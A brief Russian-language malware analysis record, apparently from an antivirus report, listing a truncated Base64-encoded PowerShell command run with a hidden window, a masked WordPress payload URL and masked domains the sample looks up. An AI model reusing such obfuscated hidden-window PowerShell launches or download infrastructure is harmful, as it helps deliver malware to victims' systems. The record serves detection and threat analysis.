Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGUAaQBwAHQAbwBlAHQAaABmAG8AaQB3AGwAZQBlAHkAYgB1AGsAPQAnAHAAYQBpAHQAZwBpAHIAdABoAGEAZABnAGEAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAF...
- http://st####rsecurity.com/wp-includes/PTyoVOEIY/
- DNS ASK sc####na.education
- DNS ASK ma##i.site
- DNS ASK ma##.work
- DNS ASK bl##.##ngjieyuan.com
- DNS ASK st####rsecurity.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGUAaQBwAHQAbwBlAHQAaABmAG8AaQB3AGwAZQBlAHkAYgB1AGsAPQAnAHAAYQBpAHQAZwBpAHIAdABoAGEAZABnAGEAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAF...' (со скрытым окном)